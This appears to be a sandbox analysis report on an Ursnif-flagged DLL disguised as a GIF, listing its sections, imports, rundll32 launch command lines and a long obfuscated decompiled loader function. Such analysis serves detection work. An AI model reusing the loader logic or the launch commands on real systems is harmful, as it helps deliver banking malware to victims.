Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x185f2	0x18600	False	0.670042067308	data	6.53345039933	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1a000	0x64	0x200	False	0.16796875	data	1.0662581269	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x1000	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x1c000	0x20b3	0x2200	False	0.359834558824	data	2.96025706595	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data	0x1f000	0x7b2	0x800	False	0.45703125	data	4.70767794561	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
user32.dll	GetActiveWindow, SetWindowsHookExA, GetLayeredWindowAttributes
kernel32.dll	GetProcAddress, LoadLibraryA, VirtualProtect, VirtualAlloc, lstrlenA, lstrcatA, lstrcmpA, GetEnvironmentVariableW
ole32.dll	OleInitialize, OleQueryCreateFromData, IIDFromString, CLIPFORMAT_UserUnmarshal, OleCreateEmbeddingHelper, HDC_UserSize
msimg32.dll	AlphaBlend, TransparentBlt
comdlg32.dll	PageSetupDlgA, PrintDlgA
oledlg.dll	OleUICanConvertOrActivateAs, OleUIChangeSourceW, OleUIConvertA
comctl32.dll	CreateStatusWindow, LBItemFromPt, DPA_Create, FlatSB_ShowScrollBar, ImageList_GetFlags
oleacc.dll	IID_IAccessible, LresultFromObject
version.dll	VerFindFileW, VerInstallFileA, VerQueryValueA, VerQueryValueW
gdiplus.dll	GdipEnumerateMetafileDestPointI, GdipCreateBitmapFromHBITMAP, GdipSetPenUnit, GdipGetImageEncoders, GdipGetPathPointsI
winspool.drv	FindNextPrinterChangeNotification, ConnectToPrinterDlg, SetPrinterDataW, GetPrinterW, DeletePrinterDataExW
shell32.dll	SHGetSpecialFolderPathA
advapi32.dll	GetKernelObjectSecurity, CryptEnumProviderTypesA, RegQueryValueExW, RegisterIdleTask

Exports

Name	Ordinal	Address
DllServer	1	0x1000447b

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6836 Parent PID: 2916

General

Start time:	10:06:16
Start date:	06/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\gg_1.gif.dll'
Imagebase:	0xef0000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000002.699200830.0000000000EC0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6864 Parent PID: 6836

General

Start time:	10:06:17
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gg_1.gif.dll',#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6908 Parent PID: 6836

General

Start time:	10:06:17
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\gg_1.gif.dll,DllServer
Imagebase:	0x1050000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.387313333.0000000004BA0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6920 Parent PID: 6864

General

Start time:	10:06:17
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\gg_1.gif.dll',#1
Imagebase:	0x1050000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.389073217.0000000004B40000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6836 Parent PID: 2916 loaddll32.exeCOMMON

Executed Functions

Function 00EA5F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 74%

			E00EA5F16(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t610;
				void* _t612;
				signed int _t613;
				intOrPtr _t619;
				void* _t626;
				void* _t628;
				void* _t630;
				signed int _t631;
				signed int _t633;
				signed int _t636;
				signed int _t638;
				void* _t640;
				intOrPtr _t641;
				signed int _t644;
				void* _t646;
				signed int _t647;
				signed int _t650;
				signed int _t652;
				signed int _t653;
				intOrPtr _t656;
				signed int _t658;
				signed int _t661;
				signed int _t665;
				void* _t667;
				signed int _t668;
				signed int _t671;
				signed int _t675;
				signed int _t677;
				void* _t679;
				signed int _t680;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				void* _t691;
				signed int _t692;
				signed int _t698;
				signed int _t701;
				signed int _t706;
				void* _t708;
				intOrPtr _t709;
				signed int _t711;
				void* _t713;
				signed int _t714;
				signed int _t717;
				intOrPtr _t720;
				signed int _t722;
				void* _t724;
				signed int _t726;
				intOrPtr _t729;
				void* _t730;
				signed int _t733;
				void* _t739;
				void* _t741;
				void* _t742;
				signed int _t744;
				void* _t746;
				signed int _t747;
				signed int _t753;
				signed int _t756;
				signed int _t760;
				void* _t762;
				signed int _t767;
				signed int _t771;
				void* _t773;
				void* _t775;
				void* _t776;
				intOrPtr _t778;
				signed int _t781;
				signed int _t785;
				intOrPtr _t788;
				signed int _t791;
				intOrPtr _t794;
				signed int _t797;
				signed int _t813;
				signed int _t816;
				void* _t819;
				signed int _t821;
				signed int _t824;
				void* _t827;
				void* _t828;
				void* _t830;
				signed int _t836;
				signed int _t840;
				signed int _t842;
				signed int _t844;
				signed int _t851;
				signed int _t856;
				signed int _t859;
				signed int _t862;
				signed int _t865;
				signed int _t867;
				signed int _t869;
				signed int _t875;
				signed int _t882;
				void* _t888;
				signed int _t889;
				signed int _t893;
				signed int _t896;
				signed int _t901;
				signed int _t906;
				signed int _t908;
				signed int _t916;
				signed int _t920;
				signed int _t924;
				signed int _t926;
				signed int _t928;
				signed int _t931;
				signed int _t934;
				signed int _t936;
				signed int _t939;
				signed int _t945;
				signed int _t947;
				signed int _t950;
				signed int _t953;
				signed int _t955;
				signed int _t958;
				void* _t966;
				signed int _t969;
				signed int _t975;
				signed int _t977;
				signed int _t979;
				signed int _t981;
				signed int _t986;
				signed int _t987;
				signed int _t1002;
				signed int _t1005;
				signed int _t1009;
				signed int _t1012;
				signed int _t1015;
				signed int _t1018;
				signed int _t1020;
				signed int _t1023;
				signed int _t1026;
				signed int _t1028;
				signed int _t1031;
				signed int _t1034;
				signed int _t1035;
				void* _t1036;
				long _t1041;
				void* _t1043;
				signed int _t1045;
				signed int _t1052;
				signed int _t1054;
				signed int _t1057;
				signed int _t1060;
				signed int _t1063;
				signed int _t1065;
				signed int _t1068;
				void* _t1069;
				signed int _t1071;
				signed int _t1074;
				void* _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1085;
				void* _t1089;
				signed int _t1091;
				void* _t1097;
				void* _t1102;
				signed int _t1103;
				signed int _t1106;
				void* _t1109;
				signed int _t1112;
				signed int _t1119;
				signed int* _t1120;
				signed int* _t1121;
				signed int* _t1122;
				signed int* _t1123;
				signed int* _t1124;
				signed int* _t1125;
				signed int* _t1126;
				signed int* _t1127;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1130;
				signed int* _t1131;
				signed int* _t1132;
				signed int* _t1133;
				signed int* _t1134;
				signed int* _t1136;
				signed int* _t1139;
				signed int* _t1140;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1143;
				signed int* _t1144;

				_t1063 = __esi;
				_t1002 = __edi;
				_t813 = __ebx;
				_push(__eax);
				 *_t1119 =  *_t1119 & 0x00000000;
				 *_t1119 =  *_t1119 + _t1102;
				_t1103 = _t1119;
				_t1120 = _t1119 + 0xfffffff0;
				_push(_t1103);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 + __ecx;
				_push(__ecx);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 ^ __edx;
				_push(_t1103);
				 *_t1120 =  *_t1120 ^ _t1103;
				 *_t1120 =  *_t1120 ^ __ebx + 0x0041cca8;
				_v16 = _v16 & 0x00000000;
				_push(_v16);
				 *_t1120 =  *_t1120 + __ebx + 0x41cd5f;
				_push( *((intOrPtr*)(__ebx + 0x41f068))());
				_pop( *_t7);
				_push(_v16);
				_pop( *_t9);
				_pop( *_t10);
				_t920 = _v16;
				_t1121 = _t1120 - 0xfffffffc;
				_push(__esi);
				 *_t1121 =  *_t1121 ^ __esi;
				 *_t1121 =  *_t1120;
				_push(_v16);
				 *_t1121 = _t920;
				_push(__edi);
				 *_t1121 =  *_t1121 - __edi;
				 *_t1121 =  *_t1121 ^ __ebx + 0x0041c01b;
				_t610 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_v16);
				 *_t1121 = _t610;
				_push(__esi);
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + __ebx + 0x41c678;
				_t612 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_pop( *_t18);
				_push(_t920);
				 *_t20 = _t612;
				_v20 = _v20 + _v20;
				_push(_v20);
				_pop(_t613);
				_v20 = _t613;
				_t836 = 0 ^  *(__ebx + 0x41c55d);
				if(_t836 > _v20) {
					_push(_v12);
					 *_t1121 = __ebx + 0x41c01b;
					_push(_t1103);
					 *_t1121 =  *_t1121 ^ _t1103;
					 *_t1121 =  *_t1121 + __ebx + 0x41c678;
					_push( *((intOrPtr*)(__ebx + 0x41f064))());
					_pop( *_t31);
					_push(_v20);
					_pop( *_t33);
				}
				_pop( *_t34);
				_t924 = _v20;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t924;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c8b2;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41d167;
				_t619 =  *((intOrPtr*)(_t813 + 0x41f068))(_t924, _t924, _t836);
				_v12 = _t836;
				 *((intOrPtr*)(_t813 + 0x41c883)) = _t619;
				 *_t1121 = _t813 + 0x41c565;
				_v12 = 0;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c574;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_v12, _v20));
				_pop( *_t48);
				_push(_v20);
				_pop( *_t50);
				_pop( *_t51);
				 *_t1121 =  *_t1121 - _t1103;
				 *_t1121 =  *_t1121 ^ _v20;
				 *_t1121 =  *_t1121 ^ _t813;
				 *_t1121 =  *_t1121 + _t813 + 0x41cd20;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_t813, _t1103));
				_pop( *_t55);
				_push(_v16);
				_pop( *_t57);
				_t626 =  *((intOrPtr*)(_t813 + 0x41f060))();
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t626;
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
				_t628 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16);
				 *_t1121 =  *_t1121 ^ _t924;
				 *_t1121 =  *_t1121 + _t628;
				_v12 = _v12 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041cfe9;
				_t630 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t924);
				_pop( *_t72);
				_t840 = _v20;
				 *_t74 = _t630;
				_v20 = _v20 + _t840;
				_push(_v20);
				_pop(_t631);
				_t1065 = _t1063;
				_t842 = _t840 & 0x00000000 | _t1103 & 0x00000000 ^  *(_t813 + 0x41ca09);
				_t1106 = _t1103;
				if(_t842 > _t631) {
					 *_t1121 =  *_t1121 & 0x00000000;
					 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
					 *_t1121 = _t813 + 0x41cfe9;
					_t631 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _t813);
					_push(_t924);
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) & 0x00000000;
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) ^ _t924 & 0x00000000 ^ _t631;
				}
				_t633 = _t631 & 0x00000000 ^  *_t1121;
				_t1122 =  &(_t1121[1]);
				 *_t1122 = _t1002;
				 *(_t813 + 0x41d240) = _t633;
				_t1005 = 0;
				_pop( *_t88);
				_t926 = 0 ^ _v20;
				_pop( *_t90);
				_t844 = _t842 & 0x00000000 ^ _v16;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t926;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 | _t844;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041c624;
				_v12 = _v12 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041d36b;
				_t636 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t926, _t1005, _t633);
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) & 0x00000000;
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) | _t844 -  *_t1122 ^ _t636;
				_t1123 =  &(_t1122[1]);
				_v16 = _v16 & 0x00000000;
				 *_t1123 =  *_t1123 ^  *_t1122;
				_v16 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c891;
				_t638 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16, _t844);
				 *_t1123 =  *_t1123 - _t1106;
				 *_t1123 =  *_t1123 | _t638;
				_v12 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c30f;
				_t640 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t1106);
				_t851 =  *_t1123;
				_t1124 =  &(_t1123[1]);
				 *_t113 = _t640;
				_v16 = _v16 + _t851;
				_push(_v16);
				_pop(_t641);
				_t928 = _t926;
				_v16 = _t1005;
				if((_t851 & 0x00000000 | _t1005 ^ _v16 |  *(_t813 + 0x41ca38)) > _t641) {
					_v20 = _v20 & 0x00000000;
					 *_t1124 =  *_t1124 | _t813 + 0x0041c891;
					_v12 = 0;
					 *_t1124 =  *_t1124 + _t813 + 0x41c30f;
					_t641 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _v20);
				}
				 *_t1124 = _t928;
				 *((intOrPtr*)(_t813 + 0x41c910)) = _t641;
				_t931 = 0;
				_v12 = _t1065;
				_t1068 = _v12;
				_v12 = 0;
				 *_t1124 =  *_t1124 | 0 ^ _a4;
				_v16 = 0;
				 *_t1124 =  *_t1124 | _t813 + 0x0041c9ef;
				_t644 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v12);
				_v12 = 0;
				 *_t1124 =  *_t1124 ^ _t644;
				 *_t1124 = _t813 + 0x41cb65;
				_t646 =  *((intOrPtr*)(_t813 + 0x41f060))(_v20, _v12);
				_t1125 =  &(_t1124[1]);
				_v12 = _t931;
				_push( *_t1124 + _t646);
				_t934 = _v12;
				_pop(_t647);
				_v12 = _t647;
				_t856 = 0 ^  *(_t813 + 0x41c187);
				_t650 = _v12;
				if(_t856 > _t650) {
					_v20 = 0;
					 *_t1125 =  *_t1125 | _t813 + 0x0041c9ef;
					 *_t1125 =  *_t1125 ^ _t856;
					 *_t1125 =  *_t1125 + _t813 + 0x41cb65;
					_t650 =  *((intOrPtr*)(_t813 + 0x41f064))(_t856, _v20);
					_v16 = _t1068;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) & 0x00000000;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) | _t1068 ^ _v16 | _t650;
					_t1068 = _v16;
				}
				_t652 = _t650 & 0x00000000 ^  *_t1125;
				_t1126 = _t1125 - 0xfffffffc;
				 *_t162 = _t652;
				_v16 = _v16 +  *((intOrPtr*)(_t652 + 0x3c));
				_push(_v16);
				_pop(_t653);
				_t936 = _t934;
				 *_t1126 = _t653;
				 *_t1126 =  *_t1126 & 0x00000000;
				 *_t1126 =  *_t1126 ^ _t813 + 0x0041c16e;
				 *_t1126 = _t813 + 0x41ce8a;
				_t656 =  *((intOrPtr*)(_t813 + 0x41f068))(_v20, _t1068, _v20);
				 *_t1126 = _t1106;
				 *((intOrPtr*)(_t813 + 0x41c0cc)) = _t656;
				_t1109 = 0;
				_t658 =  *_t1126;
				_t1127 =  &(_t1126[1]);
				 *_t1127 = _t658;
				 *_t1127 =  *_t1127 - _t856;
				 *_t1127 =  *_t1127 ^ _t658;
				 *_t1127 =  *_t1127 - _t936;
				 *_t1127 =  *_t1127 + _t813 + 0x41c791;
				_v12 = _v12 & 0x00000000;
				 *_t1127 =  *_t1127 ^ _t813 + 0x0041ca02;
				_t661 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t936, _t856, _v16);
				 *_t1127 = _t936;
				 *(_t813 + 0x41c9e0) = 0 ^ _t661;
				_t939 = 0;
				_t1128 = _t1127 - 0xfffffffc;
				_v20 = _t813;
				_t1009 =  *_t1127;
				_t816 = _v20;
				_v12 = 0;
				 *_t1128 =  *_t1128 | _t816 + 0x0041c000;
				_t665 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12);
				 *_t1128 =  *_t1128 ^ _t1009;
				 *_t1128 = _t665;
				 *_t1128 =  *_t1128 - _t1009;
				 *_t1128 =  *_t1128 ^ _t816 + 0x0041cc73;
				_t667 =  *((intOrPtr*)(_t816 + 0x41f060))(_t1009, _t1009);
				_t1129 =  &(_t1128[1]);
				 *_t1129 =  *_t1129 ^ _t1068;
				_t1069 = _t667;
				_t668 = _t1069 + (_t856 & 0x00000000 |  *_t1128);
				_t1071 = 0;
				_v20 = _t1009;
				_t859 = 0 ^  *(_t816 + 0x41c250);
				_t1012 = _v20;
				if(_t859 > _t668) {
					 *_t1129 =  *_t1129 - _t1012;
					 *_t1129 =  *_t1129 ^ _t816 + 0x0041c000;
					_v12 = 0;
					 *_t1129 =  *_t1129 | _t816 + 0x0041cc73;
					_t668 =  *((intOrPtr*)(_t816 + 0x41f064))(_v12, _t1012);
				}
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) & 0x00000000;
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) | _t859 & 0x00000000 ^ _t668;
				_t862 = _t859;
				 *_t1129 =  *_t1129 - _t1071;
				 *_t1129 =  *_t1129 + ( *(_t1012 + 6) & 0x0000ffff);
				 *_t1129 = _t816 + 0x41ca88;
				_t671 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12, _t1071);
				_v20 = _t862;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) & 0x00000000;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) | _t862 ^ _v20 ^ _t671;
				_t865 = _v20;
				_pop( *_t211);
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t816 & 0x00000000 | 0 ^ _v16);
				_t819 = _t816;
				 *_t1129 =  *_t1129 & 0x00000000;
				 *_t1129 =  *_t1129 ^ _t819 + 0x0041c863;
				_t675 =  *((intOrPtr*)(_t819 + 0x41f060))(_t819);
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) & 0x00000000;
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) | _t1109 -  *_t1129 ^ _t675;
				_t1112 = _t1109;
				 *_t1129 =  *_t1129 - _t865;
				 *_t1129 =  *_t1129 ^ _t1012;
				 *_t1129 = _t819 + 0x41ca0d;
				_t677 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _t865);
				 *_t1129 = _t677;
				 *_t1129 = _t819 + 0x41cbe6;
				_t679 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _v20);
				_t867 =  *_t1129;
				_t1130 = _t1129 - 0xfffffffc;
				 *_t230 = _t679;
				_v16 = _v16 + _t867;
				_push(_v16);
				_pop(_t680);
				_t821 = _t819;
				_t869 = _t867 & 0x00000000 | _t1071 & 0x00000000 ^  *(_t821 + 0x41d053);
				_t1074 = _t1071;
				if(_t869 > _t680) {
					_t235 = _t821 + 0x41ca0d; // 0x41ca0d
					_v12 = 0;
					 *_t1130 =  *_t1130 | _t235;
					_t238 = _t821 + 0x41cbe6; // 0x41cbe6
					 *_t1130 =  *_t1130 & 0x00000000;
					 *_t1130 =  *_t1130 + _t238;
					_t680 =  *((intOrPtr*)(_t821 + 0x41f064))(_t1074, _v12);
				}
				 *_t1130 = _t1012;
				 *(_t821 + 0x41c918) = 0 ^ _t680;
				_t1015 = 0;
				_v16 = _t869;
				_v16 = 0;
				 *_t1130 =  *_t1130 + (_t939 & 0x00000000 | _t869 ^ _v16 |  *(_t1015 + 0x54));
				_t247 = _t821 + 0x41d093; // 0x41d093
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 | _t247;
				_t682 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t1130 = _t1015;
				 *(_t821 + 0x41c4f0) = 0 ^ _t682;
				_t1018 = 0;
				 *_t250 = _t821;
				_t1020 = _t1018 & 0x00000000 ^ (_t1074 ^  *_t1130 |  *(_t821 + 0x41c166));
				_t1077 = _t1074;
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 ^ _v16;
				_t253 = _t821 + 0x41cfd9; // 0x41cfd9
				_v20 = 0;
				 *_t1130 =  *_t1130 | _t253;
				_t684 =  *((intOrPtr*)(_t821 + 0x41f060))(_v20, _t1077);
				_v20 = _t1020;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) & 0x00000000;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) | _t1020 ^ _v20 ^ _t684;
				_t1023 = _v20;
				_t1131 =  &(_t1130[1]);
				 *_t1131 = _t684;
				_t1078 = _a4;
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 |  *_t1130;
				_t268 = _t821 + 0x41ca9e; // 0x41ca9e
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 | _t268;
				_t689 =  *((intOrPtr*)(_t821 + 0x41f060))(_v12, _v12, 0);
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t689;
				_t273 = _t821 + 0x41c931; // 0x41c931
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t273;
				_t691 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t275 = _t1023;
				_v20 = _t821;
				_push(0 + _v16 + _t691);
				_t824 = _v20;
				_pop(_t692);
				_push( *((intOrPtr*)(_t824 + 0x41cccf)));
				_pop( *_t280);
				_push(_v12);
				_pop(_t875);
				if(_t875 > _t692) {
					 *_t1131 = _t824 + 0x41ca9e;
					 *_t1131 =  *_t1131 & 0x00000000;
					 *_t1131 =  *_t1131 ^ _t824 + 0x0041c931;
					_t692 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1078, _v16);
					 *_t286 = _t692;
					_push(_v16);
					_pop( *_t288);
				}
				_pop( *_t289);
				_t945 = _v12;
				_v12 = _t692;
				 *_t1131 = _t875 & 0x00000000 | _t692 ^ _v12 | _t945;
				 *_t1131 =  *_t1131 ^ _t824;
				 *_t1131 =  *_t1131 + _t945;
				_v12 = 0;
				 *_t1131 =  *_t1131 ^ _t824 + 0x0041d1ba;
				 *_t1131 = _t824 + 0x41c856;
				_t698 =  *((intOrPtr*)(_t824 + 0x41f068))(_v16, _v12, _t824, _v12);
				_v20 = _t1078;
				 *(_t824 + 0x41c0c8) = 0 ^ _t698;
				_t1081 = _v20;
				_pop( *_t304);
				_t947 = 0 ^ _v20;
				_t879 = 0 ^  *_t1131;
				_t1132 = _t1131 - 0xfffffffc;
				if(_t1023 != _t1081) {
					 *_t1132 =  *_t1132 - _t1023;
					 *_t1132 =  *_t1132 ^ _t879;
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 + _t947;
					_v16 = 0;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041c7a9;
					_t739 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20, _t1023);
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t739;
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041d026;
					_t741 =  *((intOrPtr*)(_t824 + 0x41f060))(_t824, _v12);
					_t1139 = _t1132 - 0xfffffffc;
					 *_t317 = _t741;
					_v20 = _v20 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v20);
					_pop(_t742);
					_t1045 = _t1023;
					_push(0);
					 *_t1139 = _t1045;
					_t906 = 0 ^  *(_t824 + 0x41c244);
					if(_t906 > _t742) {
						 *_t1139 =  *_t1139 ^ _t906;
						 *_t1139 =  *_t1139 | _t824 + 0x0041c7a9;
						 *_t1139 =  *_t1139 & 0x00000000;
						 *_t1139 =  *_t1139 + _t824 + 0x41d026;
						_t797 =  *((intOrPtr*)(_t824 + 0x41f064))(_t824, _t906);
						_push(0);
						 *_t1139 = _t947;
						 *(_t824 + 0x41cf47) = 0 ^ _t797;
					}
					_pop( *_t326);
					_t969 = _v12;
					_t908 =  *_t1139;
					_t1140 = _t1139 - 0xfffffffc;
					do {
						asm("movsb");
						_v12 = 0;
						 *_t1140 =  *_t1140 + _t908;
						_v12 = _v12 & 0x00000000;
						 *_t1140 =  *_t1140 + _t969;
						 *_t1140 =  *_t1140 - _t969;
						 *_t1140 =  *_t1140 | _t824 + 0x0041c831;
						_t744 =  *((intOrPtr*)(_t824 + 0x41f060))(_t969, _v12, _v12);
						 *_t1140 =  *_t1140 ^ _t1112;
						 *_t1140 =  *_t1140 ^ _t744;
						 *_t1140 =  *_t1140 & 0x00000000;
						 *_t1140 =  *_t1140 ^ _t824 + 0x0041c7fa;
						_t746 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1081, _t1112);
						_t1141 =  &(_t1140[1]);
						 *_t337 = _t746;
						_v20 = _v20 +  *_t1140;
						_push(_v20);
						_pop(_t747);
						_t1081 = _t1081;
						_v12 = _t747;
						if((0 ^  *(_t824 + 0x41c054)) > _v12) {
							 *_t1141 = _t824 + 0x41c831;
							 *_t1141 = _t824 + 0x41c7fa;
							_t794 =  *((intOrPtr*)(_t824 + 0x41f064))(_v16, _v16);
							_v16 = _t969;
							 *((intOrPtr*)(_t824 + 0x41c254)) = _t794;
						}
						_pop( *_t352);
						_t969 = 0 + _v12;
						_t1140 = _t1141 - 0xfffffffc;
						_t908 =  *_t1141 - 1;
					} while (_t908 != 0);
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t969;
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041ccd3;
					_v20 = 0;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041c339;
					_t753 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t908, _t908);
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) & 0x00000000;
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) ^ _t969 ^  *_t1140 ^ _t753;
					_t975 =  *_t1140;
					_t1142 = _t1140 - 0xfffffffc;
					_v12 = _t753;
					_t756 = _v12;
					 *_t1142 =  *_t1142 ^ _t756;
					 *_t1142 =  *_t1142 ^ _t975;
					_v20 = _v20 & 0x00000000;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c8b7;
					_push( *((intOrPtr*)(_t824 + 0x41f060))(_v20, _t756, _t969));
					_pop( *_t371);
					_push(_v16);
					_pop( *_t373);
					_pop( *_t374);
					_t977 = _t975 & 0x00000000 ^ _v16;
					 *(_t824 + 0x41c60a) = 0x40;
					 *_t1142 = _t977;
					_v16 = 0;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c4cb;
					_t760 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20);
					 *_t1142 = _t760;
					 *_t1142 = _t824 + 0x41c438;
					_t762 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v12);
					_pop( *_t386);
					 *_t1142 =  *_t1142 | _t824;
					_t830 = _t762;
					_t824 = 0;
					_v16 =  *((intOrPtr*)(_t824 + 0x41c166));
					_t916 =  *(_t824 + 0x41d118);
					_t1052 = _v16;
